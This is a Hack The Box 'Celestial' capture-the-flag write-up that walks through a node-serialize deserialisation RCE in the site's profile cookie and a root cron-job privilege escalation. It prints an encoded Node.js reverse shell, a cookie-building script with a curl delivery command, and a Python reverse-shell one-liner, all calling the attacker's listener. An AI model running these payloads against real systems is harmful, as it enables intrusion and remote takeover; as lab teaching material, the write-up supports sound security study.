HTB Celestial Writeup

Hello guys, this is Celestial. The machine was retired a few weeks ago, but I just had to write it up.
Hack The Box is an online platform that lets you test your penetration testing skills and exchange ideas and methodologies with other members with similar interests. It contains many challenges that are constantly updated; some simulate real-world scenarios and some lean more towards a CTF style of challenge.
OK, let's start.
Enumeration
Target IP: 10.10.10.85 (Celestial)
Let's look at what nmap finds:
root@kali:~# nmap -sC -sV 10.10.10.85
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2018-09-04 03:32 WIB
Nmap scan report for 10.10.10.85
Host is up (0.24s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.48 seconds
Only one service is exposed: a Node.js Express application on port 3000. That is where we focus, so a few words on what we are dealing with.
How Does Node.js Work?
Most server-side runtimes are blocking: an I/O call (database query, file read, network request) holds the program until it completes, and only then does the next statement run. Node.js is non-blocking and event-driven, like JavaScript in the browser: the I/O call is issued, execution continues, and a callback runs when the result arrives. That is why an Express app can serve many requests from a single thread.
So the box runs only this Node.js application. Let's see what it looks like in the browser.


The OpsecX blog has a post on exploiting an RCE (Remote Code Execution) bug in a Node.js module called node-serialize (CVE-2017-5941). The post explains clearly what is wrong with the module.
Next we intercept the traffic with Burp Suite to see how the request and response look. Burp Suite is a very powerful tool and we can do many things with it.

The web app sets a cookie named profile that holds the user profile as an object serialised with the vulnerable module, then base64-encoded. To see what the base64 string unpacks to, we can use Burp's Decoder.

This looks like standard JSON, but node-serialize's unserialize() does more than JSON.parse(): any string value that starts with the marker _$$ND_FUNC$$_ is passed to eval() and turned back into a function. Because the cookie is untrusted input, that means attacker-controlled text reaches eval() on the server. The easiest way to build a payload is to use the serialize() function of the same module and look at the format it produces.
I passed the following JavaScript object to serialize() to see what a serialised function looks like:
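To make the mechanism concrete, here is an added example that is not from the original writeup and not the node-serialize module's own source: a stripped-down reimplementation of its serialize()/unserialize() logic (the marker string and the eval() call are the real ones, the code around them is simplified), run against a plain serialised function and against the same function with () appended. A harmless array push stands in for the reverse shell so the example is safe to run.

```javascript
// Added example (not code from the original writeup or from node-serialize):
// a minimal reimplementation of the logic that makes unserialize() dangerous.
const FUNCFLAG = '_$$ND_FUNC$$_'; // node-serialize's function marker

// serialize(): functions become marker + their source text, everything else is plain JSON.
function serialize(obj) {
  const copy = {};
  for (const key of Object.keys(obj)) {
    copy[key] = typeof obj[key] === 'function' ? FUNCFLAG + obj[key].toString() : obj[key];
  }
  return JSON.stringify(copy);
}

// unserialize(): any string value carrying the marker is handed to eval().
// Here the input comes from a cookie, i.e. from the attacker; that is the whole bug.
function unserialize(str) {
  const obj = JSON.parse(str);
  for (const key of Object.keys(obj)) {
    if (typeof obj[key] === 'string' && obj[key].startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + obj[key].slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Side-effect recorder standing in for the reverse shell.
const executed = [];

// Case 1: a plain serialised function. unserialize() re-creates it, but nothing calls it.
function plainFunctionIsNotCalled() {
  const payload = serialize({ rce: function () { executed.push('plain'); } });
  unserialize(payload);
  return !executed.includes('plain');
}

// Case 2: "()" appended after the function body. eval() now sees an IIFE and runs it
// during deserialisation itself, before the application ever touches the object.
function iifeRunsDuringUnserialize() {
  const payload = '{"rce":"' + FUNCFLAG + "function(){executed.push('iife')}()" + '"}';
  unserialize(payload);
  return executed.includes('iife');
}

// Hardened comparison: plain JSON.parse() never turns a string into code, so the
// same payload stays an inert string.
function safeParseLeavesStringAlone() {
  const payload = '{"rce":"' + FUNCFLAG + "function(){executed.push('safe')}()" + '"}';
  const obj = JSON.parse(payload);
  return typeof obj.rce === 'string' && !executed.includes('safe');
}
```

The fix for an application is the last case: store only data in the cookie, parse it with JSON.parse(), and never revive functions from user-controlled input.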
var y = {
rce : function(){},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
Running this script in the terminal gives:
root@kali:~/tools/nodejs# node log.js
Serialized:
{"rce":"_$$ND_FUNC$$_function(){\n\n}"}
We can generate the shellcode with nodejsshell.py, which I found on GitHub; it converts a JavaScript reverse shell into a String.fromCharCode(...) list so that quotes and newlines cannot break the JSON string the serialised function lives in. Once generated, we insert it into the body of the rce function.
Exploitation
Here is how the shellcode is generated. The script takes the attacker IP and port: my IP is 10.10.14.225 and I use port 430.

After the shellcode is generated we put it inside the rce function, so log.js now looks like this:
root@kali:~/tools/nodejs# cat log.js
var y = {
rce : function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,50,50,53,34,59,10,80,79,82,84,61,34,52,51,48,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
Running it again serialises the object, giving a {"rce":"_$$ND_FUNC$$_function(){eval(...)}"} string.

Then we base64-encode the result with Burp Suite.

Do not forget to add the characters () after the closing brace of the function body, right before the closing "} of the JSON. serialize() only records the function; on unserialize() it is re-created by eval() but never called, so without the () nothing executes. With them, eval() sees an immediately-invoked function and the reverse shell runs during deserialisation. The string therefore ends in ...))}()"}. Then we base64-encode it and paste it into the profile cookie:
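The cookie can also be built without Burp. The following added script is not from the original writeup and not from nodejsshell.py: it produces the String.fromCharCode list, wraps it in the serialised-function form with the trailing (), and base64-encodes the result. The attacker address and port are the writeup's (10.10.14.225:430); the reverse-shell source is a minimal one written for this example, and the cookie name profile is assumed from the request above.

```javascript
// Added example, not code from the original writeup or from nodejsshell.py: build the
// base64 profile cookie for the node-serialize RCE. Host/port are the writeup's attacker
// values; the reverse-shell source and the cookie name are assumptions for this example.
const FUNCFLAG = '_$$ND_FUNC$$_'; // node-serialize's function marker

// Minimal JavaScript reverse shell, delivered inside eval() on the target.
function reverseShellSource(host, port) {
  return [
    "var net = require('net');",
    "var sh = require('child_process').spawn('/bin/sh', []);",
    'var client = new net.Socket();',
    `client.connect(${port}, '${host}', function () {`,
    '  client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client);',
    '});',
  ].join('\n');
}

// Encode the source as a String.fromCharCode(...) argument list so quotes and newlines
// never break the JSON string the serialised function is stored in.
function toCharCodes(src) {
  return Array.from(src, (ch) => ch.charCodeAt(0)).join(',');
}

// Wrap the charcode list in the serialised-function form. The trailing "()" after the
// closing brace is what makes eval() inside unserialize() call the function immediately;
// without it the function is only re-created, never run.
function buildPayload(src) {
  const fn = 'function(){eval(String.fromCharCode(' + toCharCodes(src) + '))}()';
  return JSON.stringify({ rce: FUNCFLAG + fn });
}

// The app stores the serialised profile base64-encoded in the cookie.
function buildCookie(host, port) {
  return Buffer.from(buildPayload(reverseShellSource(host, port)), 'utf8').toString('base64');
}

// Reverse step, handy for checking a cookie copied out of Burp: base64 -> JSON -> rce string.
function decodeCookie(b64) {
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8')).rce;
}

console.log(buildCookie('10.10.14.225', 430));
```

Start the listener first (nc -lvnp 430), then send the cookie, for example with curl: `curl -s http://10.10.10.85:3000/ -H "Cookie: profile=$(node build.js)"`. If decodeCookie() of a cookie taken from Burp does not end in `))}()`, the () step was missed and the request will come back without a connection.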

Before sending the request from Burp Suite, start a netcat listener on port 430, the port we built into the shellcode.

Forward the request from Burp Suite and we get a shell as user sun. After that, enumerate again to see what runs on this machine, and grab user.txt.
Privilege Escalation
In this limited shell I can't run sudo -l because I don't have sun's password, so I looked for jobs that run as root another way, and found a cron job executing /home/sun/Documents/script.py.

The cron job runs script.py as root, and the file lives in sun's home directory, so putting a Python reverse shell in it gives a root shell the next time the job fires. With a second netcat listener on port 431, I used this one:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.225",431));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And Tadaaaa! We got a shell session as root.


See You again. Byeee!
